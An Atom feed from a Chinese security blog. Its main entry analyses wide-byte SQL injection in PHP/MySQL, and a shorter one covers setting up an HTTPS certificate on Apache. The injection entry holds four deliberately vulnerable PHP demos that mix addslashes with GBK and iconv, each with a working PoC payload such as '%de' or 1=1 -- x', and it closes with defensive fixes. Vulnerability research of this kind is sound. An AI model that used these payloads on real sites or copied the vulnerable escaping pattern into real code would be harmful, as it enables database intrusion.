atom.xml

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Anka9080&#39;s Notes</title>
  <subtitle>勿忘初心。</subtitle>
  <link href="/atom.xml" rel="self"/>
  
  <link href="http://www.evilclay.com/"/>
  <updated>2017-07-20T13:57:14.903Z</updated>
  <id>http://www.evilclay.com/</id>
  
  <author>
    <name>Anka9080</name>
    
  </author>
  
  <generator uri="http://hexo.io/">Hexo</generator>
  
  <entry>
    <title>宽字节注入深入研究</title>
    <link href="http://www.evilclay.com/2017/07/20/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E6%B7%B1%E5%85%A5%E7%A0%94%E7%A9%B6/"/>
    <id>http://www.evilclay.com/2017/07/20/宽字节注入深入研究/</id>
    <published>2017-07-20T13:18:21.000Z</published>
    <updated>2017-07-20T13:57:14.903Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一些概念"><a href="#一些概念" class="headerlink" title="一些概念"></a>一些概念</h2><p>单字节字符集： 所有的字符都使用一个字节来表示，比如 ASCII 编码。 </p>
<p>多字节字符集： 在多字节字符集中，一部分字节用多个字节来表示，另一部分（可能没有）用单个字节来表示。</p>
<p>两位的多字节字符有一个前导字节和尾字节。 在某个多字节字符集内，前导字节位于某个特定范围内，尾字节也一样。</p>
<p>UTF-8 编码： 是一种编码的编码方式（多字节编码），它可以使用1~4个字节表示一个符号，根据不同的符号而变化字节长度。[1]</p>
<p>常见的宽字节：  GB2312、GBK、GB18030、BIG5、Shift_JIS</p>
<p>GB2312 不存在宽字节注入，可以收集存在宽字节注入的编码。</p>
<h2 id="目的"><a href="#目的" class="headerlink" title="目的"></a>目的</h2><p>一提到 宽字节注入， 笔者首先会想到由于 后端 编码和 数据库编码的 不统一，导致用户的数据 绕过(吃掉)本身的转义符号（\）从而数据 被当作 SQL 指令来执行。</p>
<p>这句话对不对呢，经过今天公司的 showcase 之后我产生了怀疑。  从而得到观点二：</p>
<p>宽字节注入的原因是因为 数据库后端采用了 非 单字节 编码，也就是说 UTF-8， GB2312 等都可以导致宽字节注入。</p>
<p>下面我们就来验证验证观点一和观点二到底那个正确。</p>
<p><strong>最终的实验结论在这里：要有宽字节注入漏洞，首先要满足数据库后端使用双/多字节解析SQL语句，其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字符，初步的测试结果 Big5 和 GBK 字符集都是有的， UTF-8 和 GB2312 没有这种字符（也就不存在宽字节注入）。</strong></p>
<h2 id="SQL-执行原理"><a href="#SQL-执行原理" class="headerlink" title="SQL 执行原理"></a>SQL 执行原理</h2><p>网上遇到一个能较好体现 SQL 语句的解析&amp;执行过程的图片，在这里：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/sql_parse.jpg" alt="SQL语句解析过程" title="">
                </div>
                <div class="image-caption">SQL语句解析过程</div>
            </figure>
<p>SQL 在执行过程中，会分为如下几个部分：</p>
<ol>
<li>客户端以某种字符生成SQL语句发送至服务器，这里“某种字符”其实是任意规定的，当 PHP 作为客户端连接 MySQL 的时候，这个字符集就是 PHP 的默认编码。</li>
<li>服务器接收到请求后会把客户端编码的字符串转换成连接层编码字符串（具体流程是先使用系统变量 character_set_client 对 SQL 语句进行解码后 会使用 系统变量 character_set_connection 对解码后的十六进制进行编码）。</li>
<li>进行内部操作前，将 请求 按照如下规则转化成内部操作字符集，如下：<br> 3.1 使用字段 CHARACTER SET 设定值；<br> 3.2 若上述值不存在，使用对应数据表的DEFAULT CHARACTER SET设定值；<br> 3.3 若上述值不存在，则使用对应数据库的DEFAULT CHARACTER SET设定值；<br> 3.4 若上述值不存在，则使用character_set_server设定值。</li>
<li>执行完 SQL 语句之后，将执行结果按照 character_set_results 编码进行输出。</li>
</ol>
<p>使用 SET NAMES <charset> 命令可以把 character_set_client  character_set_client character_set_results 设置成统一的字符编码，比如：</charset></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/set_names_demo.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>使用这一步的命令结果会使用 MySQL 数据库使用 gbk 的编码对客户端传来 SQL 语句进行解析执行，并把结果集以 gbk 编码的形式输出。</p>
<h2 id="实验"><a href="#实验" class="headerlink" title="实验"></a>实验</h2><p>参照 深入探究宽字节注入漏洞与修补原理 这篇文章我们来进行一些实验，从而从 SQL执行原理上对 宽字节注入进行分析。</p>
<h3 id="情景一"><a href="#情景一" class="headerlink" title="情景一"></a>情景一</h3><p>在 PHP 代码中使用 mysql_query(“set names GBK”)； 指定三个字符集（客户端、连接层、结果集）都是GBK编码。</p>
<p>场景代码如下 demo1.php ：</p>
<pre><code>&lt;?php 
$name = addslashes($_GET[&apos;name&apos;]);
$con=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;fuckroot&quot;,&quot;sqli&quot;); 
if (mysqli_connect_errno($con)) 
{ 
    echo &quot;连接 MySQL 失败: &quot; . mysqli_connect_error(); 
} 
// 执行查询
$sql = &quot;select * from user where name = &apos;&quot;.$name.&quot;&apos;&quot;;
echo &quot;SQL:&quot;.$sql.&quot;&lt;br&gt;&quot;;
mysqli_query($con,&quot;set names GBK&quot;);
$result = mysqli_query($con,$sql);
if(!$result){
    // 打印错误原因
    printf(&quot;Error: %s\n&quot;, mysqli_error($con));
}
// echo(&quot;Res num_rows:&quot;.$result-&gt;num_rows.&quot;&lt;br&gt;&quot;);
// 一条条获取
while ($row=mysqli_fetch_row($result))
{
    printf (&quot;%s : %s&quot;,$row[0],$row[1]);
    echo &quot;&lt;br&gt;&quot;;
}
// 释放结果集合
mysqli_free_result($result);
// $row=mysqli_fetch_row($result);
echo &quot;Closed!&quot;;
mysqli_close($con);
?&gt;
</code></pre><h4 id="PoC"><a href="#PoC" class="headerlink" title="PoC"></a>PoC</h4><p>访问 <a href="http://ubuntu.com/sqli_widebytes/demo1.php?name=111%de" target="_blank" rel="external">http://ubuntu.com/sqli_widebytes/demo1.php?name=111%de</a>‘ or 1=1 – x</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo1.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>可以发现 or 1=1 已经被成功执行，结果集不为空。</p>
<p>为了可以清晰的追踪 SQL 语句的执行过程，我们把 SQL 语句的执行 log 打印出来，配置方式参考 <a href="https://github.com/exp-db/CommandNoteBook/blob/master/Ubuntu%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4.md#mysql-52-以上版本开启-query-log" target="_blank" rel="external">这里</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo1_query_log.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>可以看到 先设置 客户端、连接层、结果集 都是 GBK 编码，然后执行下面的SQL语句 ：</p>
<pre><code>select * from user where name = &apos;111�\&apos; or 1=1 -- x&apos;
</code></pre><p>下面分析 这条语句是如何生成的：</p>
<p>111%de’ or 1=1 – x <code>—-经过 URL 解码—-&gt;</code>  1110xDE’ or 1=1 –x   <code>—-经过 addslashes 处理—-&gt;</code> 1110xDE\’ or 1=1 –x ，随后拼接成如下 SQL 语句：</p>
<pre><code>select * from user where name = &apos;1110xDE\&apos; or 1=1 -- x&apos;
</code></pre><p>由于在 bash 默认编码环境中 十六进制字符 0xDE 是不可显示字符，所以在 查询 log 中 会用 乱码 � 代替 0xDE。</p>
<p>接下来分析这条SQL语句是如何被解析执行的：</p>
<p>由于前面设定了 客户端 和 连接层都是使用 GBK 编码，现在需要使用 GBK 对传来的 SQL 语句进行解析。</p>
<p>\ 的十六进制是 0x5C，由于十六进制 0xDE5C 会被 GBK 解码成  一个生僻的汉字 <strong>轡</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo1_gbk_shift.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>所以 GBK 解码之后执行的 SQL 语句是：</p>
<p>select * from user where name = ‘111轡’ or 1=1 – x’</p>
<p>addslashes 转移的 反斜杠被吃掉，导致最终的 SQL 语句执行。</p>
<p>一句话总结起来是 转义后的反斜杠与之前的十六进制字符 0x5C 在 GBK 编码情况下被解析成新一个双字节字符（轡），进而用户输入的单引号逃逸，导致 SQL 注入。</p>
<h3 id="情景二"><a href="#情景二" class="headerlink" title="情景二"></a>情景二</h3><p>使用 set names UTF-8 指定了 UTF-8 字符集，在 addslashes 函数处理之后使用 转码函数进行转码处理。<br>比如有时候，为了避免乱码，会将一些用户提交的 GBK 字符使用 iconv 函数（或者mb_convert_encoding）先转为 UTF-8，然后再拼接入 SQL 语句。</p>
<p>场景代码如下 demo2.php：</p>
<pre><code>&lt;?php 
$name = iconv(&quot;GBK&quot;,&quot;UTF-8&quot;, addslashes($_GET[&apos;name&apos;])) ; 
$con=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;fuckroot&quot;,&quot;sqli&quot;); 
if (mysqli_connect_errno($con)) 
{ 
    echo &quot;连接 MySQL 失败: &quot; . mysqli_connect_error(); 
} 
// 执行查询
$sql = &quot;select * from user where name = &apos;&quot;.$name.&quot;&apos;&quot;;
echo &quot;SQL:&quot;.$sql.&quot;&lt;br&gt;&quot;;
mysqli_query($con,&quot;set names UTF-8&quot;);
$result = mysqli_query($con,$sql);
if(!$result){
    // 打印错误原因
    printf(&quot;Error: %s\n&quot;, mysqli_error($con));
}
// 一条条获取
while ($row=mysqli_fetch_row($result))
{
    printf (&quot;%s : %s&quot;,$row[0],$row[1]);
    echo &quot;&lt;br&gt;&quot;;
}
// 释放结果集合
mysqli_free_result($result);
// $row=mysqli_fetch_row($result);
echo &quot;Closed!&quot;;
mysqli_close($con);
?&gt;
</code></pre><h4 id="PoC-1"><a href="#PoC-1" class="headerlink" title="PoC"></a>PoC</h4><p>访问 <a href="http://ubuntu.com/sqli_widebytes/demo2.php?name=111%B3" target="_blank" rel="external">http://ubuntu.com/sqli_widebytes/demo2.php?name=111%B3</a>‘ or 1=1 – x</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo2.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>同样导致了SQL注入，这里原理就比较好玩了。</p>
<p>先说结论： 由于 addslashed 转义后生成的 反斜杠（\），被 iconv 函数 在从 GBK 到 UTF-8 转码的过程中吃掉了，所以进入MySQL服务器之前用户输入单引号已经逃逸。</p>
<p>现在来一步一步理一下这个过程：</p>
<p>%B3’ or 1=1 – x <code>—经过 URL Decode 处理—-&gt;</code> 0xB3’ or 1=1 – x <code>— 经过 addslashed 处理 —&gt;</code> 0xB3\’ or 1=1 – x</p>
<p>然后经过 转码函数 <code>iconv(&quot;GBK&quot;,&quot;UTF-8&quot;, &lt;payload&gt;)</code> 处理， 这一步是比较有意思的，需要深入分析下：</p>
<ol>
<li>首先要理解这个神奇的转码函数 iconv() 是用来干嘛的。</li>
</ol>
<p>大家都知道 无论什么编码的文字，都会以十六进制（其实是二进制，十六进制便于表述）的方式保存在磁盘中。</p>
<p>也就是说相同的一个 字符，比如 <strong>睿</strong> ， 他在 UTF-8 和 GBK 的编码方式下存储的十六进制是不同的，如下图所示：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/gbk_rui.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/utf-8_rui.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>可以 看出相同的 字符 <strong>睿</strong> ，在 GBK 编码的情况下 和 UTF-8 的情况下 分别存储成 EEA3 和 E79DBF。</p>
<p>所以 iconv(“GBK”,”UTF-8”, “睿”) 其实就是把 对应的二进制从 EEA3 转换成 E79DBF 的过程，只不过编码不同，表示的还是同一个字符。</p>
<ol>
<li>接着按照之前的分析 首先对十六进制的 payload 进行 GBK 解码处理，得到真正 想要表达的字符。</li>
</ol>
<p>0xB3\’ or 1=1 – x 的 十六进制表现形式 0xB35C 27 20 6F 72 20 31 3D 31 20 2D 2D 20 78 20</p>
<p>可以把 0xB35C 27 20 6F 72 20 31 3D 31 20 2D 2D 20 78 20 理解成经过 GBK 编码后存储内存中的真实数据，先用 GBK 对其进行解码看看其是什么样的字符</p>
<p>重点是 GBK 会把 B35C 解码成一个中文字符 <strong>砛</strong> ，如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/gbk_b35c.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>把所有十六进制解码成 砛’ or 1=1 – x </p>
<p>可以发现 使用 GBK 对输入的数据进行 解码处理在这一步已经把 转义的反斜杠给吃掉了，后面就是 使用 UTF-8 编码对这段字符编码成十六进制的形式存储在内存中的故事了。</p>
<p>UTF-8 编码的结果如下所示：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/utf-8_payload.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>合在一起就是 0xE7A09B 27 20 6F 72 20 31 3D 31 20 2D 2D 20 78 20 ，根据编码结果可以看出 GBK 和 UTF-8 对 1-127 范围内的字符编码都是沿用了 ASCII 码，结果是相同的。</p>
<p>到这一步我们得到了 数据库接收 SQL 语句的 十六进制形式，下面根据 SET NAMES UTF8 可知数据库会用 UTF-8 编码对这段语句进行解码，</p>
<p>当然结果其实已经知道了，UTF-8 的解码结果就是 砛’ or 1=1 – x </p>
<p>所以说最终执行的 SQL 语句是：</p>
<p>select * from user where name = ‘111砛’ or 1=1 – x’</p>
<h3 id="场景三"><a href="#场景三" class="headerlink" title="场景三"></a>场景三</h3><p>这个场景和场景二有些类似，在 iconv 的使用上与上一个相反，用 iconv 函数是用来把 UTF-8 的编码转换成 GBK 编码。</p>
<p>按理说这种用法应该不会常见，因为转换成 GBK 编码的数据最后插入数据库时会用 UTF-8 的编码来解析导致最后的单引号溢出，奇怪的74CMS 3.4版本还真有这样一个漏洞，相关的分析在<a href="http://www.cnbraid.com/2016/sql4.html" target="_blank" rel="external">这篇文章里</a>，说句题外话，看到最后的ID 才发现是我的一位大牛学长早期的作品，厉害厉害。</p>
<p>代码在这里（demo3.php）：</p>
<pre><code>&lt;?php 
$name = iconv(&quot;UTF-8&quot;,&quot;GBK&quot;, addslashes($_GET[&apos;name&apos;])) ; 
$con=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;fuckroot&quot;,&quot;sqli&quot;); 
// 执行查询
$sql = &quot;select * from user where name = &apos;&quot;.$name.&quot;&apos;&quot;;
echo &quot;SQL:&quot;.$sql.&quot;&lt;br&gt;&quot;;
// mysqli_query($con,&quot;set names UTF-8&quot;);
$result = mysqli_query($con,$sql);
// echo(&quot;Res num_rows:&quot;.$result-&gt;num_rows.&quot;&lt;br&gt;&quot;);
// 一条条获取
while ($row=mysqli_fetch_row($result))
{
    printf (&quot;%s : %s&quot;,$row[0],$row[1]);
    echo &quot;&lt;br&gt;&quot;;
}
// 释放结果集合
mysqli_free_result($result);
// $row=mysqli_fetch_row($result);
echo &quot;Closed!&quot;;
mysqli_close($con);
?&gt;
</code></pre><h4 id="PoC-2"><a href="#PoC-2" class="headerlink" title="PoC"></a>PoC</h4><p>访问 ：<a href="http://ubuntu.com/sqli_widebytes/demo3.php?name=錦" target="_blank" rel="external">http://ubuntu.com/sqli_widebytes/demo3.php?name=錦</a>‘ or 1=1 – x</p>
<p>输出：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo3.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>其实这里访问 <a href="http://ubuntu.com/sqli_widebytes/demo3.php?name=%E9%8C%A6" target="_blank" rel="external">http://ubuntu.com/sqli_widebytes/demo3.php?name=%E9%8C%A6</a>‘ or 1=1 – x 得到的效果也是一样的。</p>
<p>这里参考上一个场景的分析直接从 十六进制 的这个请求开始啦</p>
<p>%E9%8C%A6’ or 1=1 – x  <code>— URL解码 —&gt;</code> 0xE98CA6’ or 1=1 – x <code>— addslashes处理 —&gt;</code> 0xE98CA6\’ or 1=1 – x</p>
<p>由于 E98CA6 是 <strong>錦</strong> 的十六进制编码，所以使用 iconv 转换成后得到的 GBK 编码如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo3_gbk.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>所以 payload 经过 iconv 转换后 的十六进制结果是 0xE55C5C 27 20 6F 72 20 31 3D 31 20 2D 2D 20 78</p>
<p>得到了 发送给数据库的十六进制的 Payload，现在使用默认的 UTF-8 编码对数据进行解码，得到</p>
<p>�\‘ or 1=1 – x</p>
<p>因为 E5 不被 UTF-8 编码所识别，所以转换成乱码，从而， 从 錦 分离出的 5C 和 转义生成 5C 组成 \，也就是把转义生成的反斜杠给转义了，导致用户输入的单引号逃逸。</p>
<h3 id="情景四"><a href="#情景四" class="headerlink" title="情景四"></a>情景四</h3><p>先使用 iconv 进行字符集转换，将UTF-8转为GBK，然后使用 addslashes 函数对特殊字符进行转义，同时，set names字符集为GBK。</p>
<p>这种场景确实比较少见，不过也并不是不会存在，下面给出场景代码：</p>
<p>场景四 （demo4.php）</p>
<pre><code>&lt;?php 
$name = iconv(&quot;UTF-8&quot;,&quot;GBK&quot;, $_GET[&apos;name&apos;]) ; 
$name = addslashes($name);
$con=mysqli_connect(&quot;localhost&quot;,&quot;root&quot;,&quot;fuckroot&quot;,&quot;sqli&quot;); 
if (mysqli_connect_errno($con)) 
{ 
    echo &quot;连接 MySQL 失败: &quot; . mysqli_connect_error(); 
} 
// 执行查询
$sql = &quot;select * from user where name = &apos;&quot;.$name.&quot;&apos;&quot;;
echo &quot;SQL:&quot;.$sql.&quot;&lt;br&gt;&quot;;
mysqli_query($con,&quot;set names GBK&quot;);
$result = mysqli_query($con,$sql);
if(!$result){
    // 打印错误原因
    printf(&quot;Error: %s\n&quot;, mysqli_error($con));
}
// 一条条获取
while ($row=mysqli_fetch_row($result))
{
    printf (&quot;%s : %s&quot;,$row[0],$row[1]);
    echo &quot;&lt;br&gt;&quot;;
}
// 释放结果集合
mysqli_free_result($result);
// $row=mysqli_fetch_row($result);
echo &quot;Closed!&quot;;
mysqli_close($con);
?&gt;
</code></pre><h4 id="PoC-3"><a href="#PoC-3" class="headerlink" title="PoC"></a>PoC</h4><p>访问 <a href="http://ubuntu.com/sqli_widebytes/demo4.php?name=錦" target="_blank" rel="external">http://ubuntu.com/sqli_widebytes/demo4.php?name=錦</a>‘ or 1=1 – x</p>
<p>显示（需要把页面编码设置成简体中文）：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/widebyte_sqli/demo4.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>该场景下 PoC 与 场景三的 PoC 完全一致，但是 处理的过程却不是相同的。</p>
<p>錦’ or 1=1 – x <code>— 经过iconv转换成GBK编码 —&gt;</code> 0xE55C27 or 1=1 – x <code>— 经过addslashes处理 —&gt;</code> 0xE55C5C5C27 or 1=1 – x</p>
<p>可以看出使用addslashes处理时，不仅转义了单引号，还转移了5C，这是为啥呢，因为addslashes会把输入的字符当做 UTF-8 处理，导致对 5C（UTF-8的反斜杠）也进行了转义，最后 MySQL 服务器接收到 该 Payload 之后使用 GBK 编码的方式进行解码：</p>
<p>錦\‘ or 1=1 – x </p>
<p>经过两个转义 配合 GBK 对 SQL 语句进行解码导致了 最后 单引号成功逃逸，不容易啊。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>至此关于手上的宽字节注入场景分析完毕，可以看出 在使用UTF-8 对 SQL 语句进行解析时，若想发生 注入，并不是在 解析 MySQL 语句的阶段，而是在客户端提交到 服务器之前就已经发生了 SQL 注入，所以这种注入 并不是 UTF-8 编码的锅， 统一使用 UTF-8 编码并且不要使用危险的函数 iconv 是一个比较安全的编码方案。</p>
<p>如果由于历史遗留原因一定要使用 GBK 的编码（解析）方式，可以采用 mysql_set_charset 配合 mysql_real_escape_string 转义的方式进行防护。可以参考 <a href="http://blog.csdn.net/u011721501/article/details/42874517" target="_blank" rel="external">文章</a>末尾提供的案例，行了，晚安。</p>
<p>在代码审计的较多需要留意一下 类似 GBK 和 BIG5 这种的双字节编码，同时存在低字节位位可以是 %5C 的字符，如果使用这种存在这种字符的编码对 SQL 语句进行解析，宽字节注入就离你不远啦。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html" target="_blank" rel="external">http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html</a></li>
<li><a href="http://www.laruence.com/2008/01/05/12.html" target="_blank" rel="external">http://www.laruence.com/2008/01/05/12.html</a></li>
<li><a href="https://dev.mysql.com/doc/refman/5.7/en/charset-connection.html" target="_blank" rel="external">https://dev.mysql.com/doc/refman/5.7/en/charset-connection.html</a></li>
<li><a href="http://blog.csdn.net/u011721501/article/details/42874517" target="_blank" rel="external">http://blog.csdn.net/u011721501/article/details/42874517</a></li>
<li><a href="http://www.cnbraid.com/2016/sql4.html" target="_blank" rel="external">http://www.cnbraid.com/2016/sql4.html</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;一些概念&quot;&gt;&lt;a href=&quot;#一些概念&quot; class=&quot;headerlink&quot; title=&quot;一些概念&quot;&gt;&lt;/a&gt;一些概念&lt;/h2&gt;&lt;p&gt;单字节字符集： 所有的字符都使用一个字节来表示，比如 ASCII 编码。 &lt;/p&gt;
&lt;p&gt;多字节字符集： 在多字节字符集中，
    
    </summary>
    
    
      <category term="漏洞分析" scheme="http://www.evilclay.com/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
    
      <category term="SQL注入" scheme="http://www.evilclay.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="宽字节注入" scheme="http://www.evilclay.com/tags/%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5/"/>
    
  </entry>
  
  <entry>
    <title>部署阿里云免费HTTPS证书笔记</title>
    <link href="http://www.evilclay.com/2017/06/12/%E9%83%A8%E7%BD%B2%E9%98%BF%E9%87%8C%E4%BA%91%E5%85%8D%E8%B4%B9HTTPS%E8%AF%81%E4%B9%A6%E7%AC%94%E8%AE%B0/"/>
    <id>http://www.evilclay.com/2017/06/12/部署阿里云免费HTTPS证书笔记/</id>
    <published>2017-06-12T12:39:11.000Z</published>
    <updated>2017-06-12T12:40:15.581Z</updated>
    
    <content type="html"><![CDATA[<h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><pre><code>Ubuntu 16.04
Apache2
</code></pre><h2 id="设置域名A记录"><a href="#设置域名A记录" class="headerlink" title="设置域名A记录"></a>设置域名A记录</h2><blockquote>
<p>注意：已经存在的网站不需要这一步操作。</p>
</blockquote>
<p>这一步是用来把 域名 绑定到指定的 IP 上，访问域名会直接返回 IP 的 Web 默认路径。</p>
<p>在控制台新增加一条域名(x.evilclay.com)的A记录解析：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/https/a_record.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="新建虚拟主机"><a href="#新建虚拟主机" class="headerlink" title="新建虚拟主机"></a>新建虚拟主机</h2><blockquote>
<p>注意：已经存在的网站也不需要这一步操作。</p>
</blockquote>
<p>之前写的笔记 <a href="http://www.evilclay.com/2017/03/13/Apache绑定多域名%20or%20多端口配置命令">Apache绑定多域名or多端口配置命令</a> 中的多域名相关配置写的就是这一部分的配置，在这里直接搞吧。</p>
<p>新建 x.evilclay.com 作为新的虚拟主机。</p>
<p>在 /etc/apache2/sites-enable/目录下新建 x.evilclay.com.conf 配置文件，内容如下：</p>
<pre><code>&lt;VirtualHost *:80&gt;
ServerName x.evilclay.com  # 域名
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/x.evilclay.com  # 虚拟主机目录
ErrorLog ${APACHE_LOG_DIR}/error_x.evilclay.com.log
CustomLog ${APACHE_LOG_DIR}/access_x.evilclay.com.log combined
&lt;/VirtualHost&gt;
</code></pre><p>为了测试是否成功 在 /var/www/html 中创建 x.evilclay.com 目录，新建 hello.txt 文件用来测试配置是否成功，内容如下：</p>
<pre><code>ubuntu@evilclay:/var/www/html/x.evilclay.com$ cat hello.txt
Hello Baby!
</code></pre><p>重启 apache2 使用浏览器访问 <a href="http://x.evilclay.com/hello.txt" target="_blank" rel="external">http://x.evilclay.com/hello.txt</a> ，显示如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/https/http_ok.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>可以看出新建的虚拟主机 x.evilclay.com 已经可以成功解析。</p>
<h2 id="申请阿里云免费证书"><a href="#申请阿里云免费证书" class="headerlink" title="申请阿里云免费证书"></a>申请阿里云免费证书</h2><ul>
<li>登录：阿里云控制台，产品与服务，证书服务，购买证书。</li>
<li>购买：证书类型选择 免费型DV SSL，然后完成购买。</li>
<li>补全：在 我的证书 控制台，找到购买的证书，在操作栏里选择 补全。填写证书相关信息，在这一步，我的域名填写成 x.evilclay.com，对应修改成上一部你的域名。</li>
<li>域名验证：可以选择 DNS，如果域名用了阿里云的 DNS 服务，再勾选一下 证书绑定的域名在 阿里云的云解析。</li>
<li>上传：系统生成 CSR，点一下 创建。</li>
<li>提交审核。</li>
</ul>
<p>根据提示，24小时内会给出审核结果，审核通过如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/https/cert_aliyun.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>点击操作-下载按钮，把证书的相关密钥下载到本地，待会需要上传到服务器上。</p>
<p>主要包含：</p>
<ul>
<li>证书文件214144412712457.pem</li>
<li>证书私钥文件214144412712457.key</li>
<li>证书公钥文件public.pem</li>
<li>证书链文件chain.pem。</li>
</ul>
<h2 id="服务器配置HTTPS证书"><a href="#服务器配置HTTPS证书" class="headerlink" title="服务器配置HTTPS证书"></a>服务器配置HTTPS证书</h2><p>登陆到服务器上，先安装HTTPS证书相关库：</p>
<pre><code>sudo apt-get install openssl
</code></pre><p>之后在 /etc/apache2 目录下新建 cert 目录，并把刚这四个文件上传到该目录。</p>
<pre><code>sudo cd /etc/apache2  
sudo mkdir cert
</code></pre><p>启用 Apache 的 SSL 模块：</p>
<pre><code>sudo a2enmod ssl
</code></pre><p>再配置服务器域名绑定：</p>
<pre><code>sudo cp /etc/apache2/sites-enabled/x.evilclay.com /etc/apache2/sites-enabled/x.evilclay.com_ssl    
sudo vim x.evilclay.com_ssl
</code></pre><p>在<virtualhost *:80="">段中，DocumentRoot一行的下方加入内容：</virtualhost></p>
<pre><code># 添加 SSL 协议支持协议，去掉不安全的协议
SSLProtocol TLSv1 TLSv1.1 TLSv1.2
# 修改加密套件如下
SSLCipherSuite ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4
# 证书公钥配置
SSLCertificateFile /etc/apache2/cert/public.pem
# 证书私钥配置
SSLCertificateKeyFile /etc/apache2/cert/214144412790737.key
# 证书链配置，如果该属性开头有 &apos;#&apos;字符，请删除掉
SSLCertificateChainFile /etc/apache2/cert/chain.pem
</code></pre><p>端口修改为：443，即<virtualhost *:443="">(ssl的端口)</virtualhost></p>
<p> 重启 Apache2, 访问 <a href="https://x.evilclay.com/hello.txt" target="_blank" rel="external">https://x.evilclay.com/hello.txt</a> 再次进行测试：</p>
<p> <img src="http://7xku36.com1.z0.glb.clouddn.com/https/https_ok.png" alt=""></p>
<p> 至此，从新建虚拟主机到配置HTTPS证书已经完成。</p>
<h2 id="HTTP请求重定向HTTPS"><a href="#HTTP请求重定向HTTPS" class="headerlink" title="HTTP请求重定向HTTPS"></a>HTTP请求重定向HTTPS</h2><p>在配置文件里对 80 端口的流量做一个重定向即可：</p>
<pre><code>vim /etc/apache2/sites-available/x.evilclay.com.conf

//在&lt;VirtualHost *:80&gt;&lt;/VirtualHost&gt; 标签内加入下面一行
Redirect permanent / https://x.evilclay.com/
